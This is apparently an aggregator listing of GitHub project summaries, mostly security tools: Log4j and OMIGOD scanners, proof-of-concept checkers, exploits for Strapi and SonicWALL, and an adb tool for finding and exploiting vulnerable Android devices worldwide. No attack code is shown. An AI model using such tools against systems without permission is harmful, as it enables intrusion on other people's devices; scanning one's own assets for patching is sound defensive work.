We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them

Mitiga 13 Jan 4, 2022
Testinfra test your infrastructures

Testinfra test your infrastructure Latest documentation: https://testinfra.readthedocs.io/en/latest About With Testinfra you can write unit tests in P

pytest-dev 2.1k Jan 7, 2023
A simple automatic tool for finding vulnerable log4j hosts

Log4Scan A simple automatic tool for finding vulnerable log4j hosts Installation pip3 install -r requirements.txt Usage usage: log4scan.py [-h] (-f FI

Federico Rapetti 20018955 6 Mar 10, 2022
Strapi Framework Vulnerable to Remote Code Execution

CVE-2019-19609 Strapi Framework Vulnerable to Remote Code Execution well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/ Usage pytho

Dasith Vidanage 7 Mar 8, 2022
Python based framework providing a simple and intuitive framework for algorithmic trading

Harvest is a Python based framework providing a simple and intuitive framework for algorithmic trading. Visit Harvest's website for details, tutorials

null 100 Jan 3, 2023
PyTorch framework A simple and complete framework for PyTorch, providing a variety of data loading and simple task solutions that are easy to extend and migrate

PyTorch framework A simple and complete framework for PyTorch, providing a variety of data loading and simple task solutions that are easy to extend and migrate

Cong Cai 12 Dec 19, 2021
In this repository, I have developed an end to end Automatic speech recognition project. I have developed the neural network model for automatic speech recognition with PyTorch and used MLflow to manage the ML lifecycle, including experimentation, reproducibility, deployment, and a central model registry.

End to End Automatic Speech Recognition In this repository, I have developed an end to end Automatic speech recognition project. I have developed the

Victor Basu 22 Nov 13, 2022
Automatic self-diagnosis program (python required)Automatic self-diagnosis program (python required)

auto-self-checker 자동으로 자가진단 해주는 프로그램(python 필요) 중요 이 프로그램이 실행될때에는 절대로 마우스포인터를 움직이거나 키보드를 건드리면 안된다(화면인식, 마우스포인터로 직접 클릭) 사용법 프로그램을 구동할 폴더 내의 cmd창에서 pip

null 1 Dec 30, 2021
SonicWALL SSL-VPN Web Server Vulnerable Exploit

SonicWALL SSL-VPN Web Server Vulnerable Exploit

null 44 Nov 15, 2022
The tool helps to find hidden parameters that can be vulnerable or can reveal interesting functionality that other hunters miss.

The tool helps to find hidden parameters that can be vulnerable or can reveal interesting functionality that other hunters miss. Greater accuracy is achieved thanks to the line-by-line comparison of pages, comparison of response code and reflections.

null 197 Nov 14, 2022
adb - A tool that allows you to search for vulnerable android devices across the world and exploit them.

adb - An exploitation tool for android devices. A tool that allows you to search for vulnerable android devices across the world and exploit them. Fea

null 136 Jan 2, 2023
OMIGOD! OM I GOOD? A free scanner to detect VMs vulnerable to one of the

omigood (OM I GOOD?) This repository contains a free scanner to detect VMs vulnerable to one of the "OMIGOD" vulnerabilities discovered by Wiz's threa

Marco Simioni 13 Jul 13, 2022
Proof of concept to check if hosts are vulnerable to CVE-2021-41773

CVE-2021-41773 PoC Proof of concept to check if hosts are vulnerable to CVE-2021-41773. Description (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CV

Jordan Jay 43 Nov 9, 2022
OpenSource Poc && Vulnerable-Target Storage Box.

reapoc OpenSource Poc && Vulnerable-Target Storage Box. We are aming to collect different normalized poc and the vulerable target to verify it. Now re

cckuailong 560 Dec 23, 2022
Mass Check Vulnerable Log4j CVE-2021-44228

Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co

Justakazh 6 Dec 28, 2022
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

Fox-IT 431 Dec 22, 2022
Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.

Log4j_checker.py (CVE-2021-44228) Description This Python3 script tries to look for servers vulnerable to CVE-2021-44228, also known as Log4Shell, a v

lfama 8 Feb 27, 2022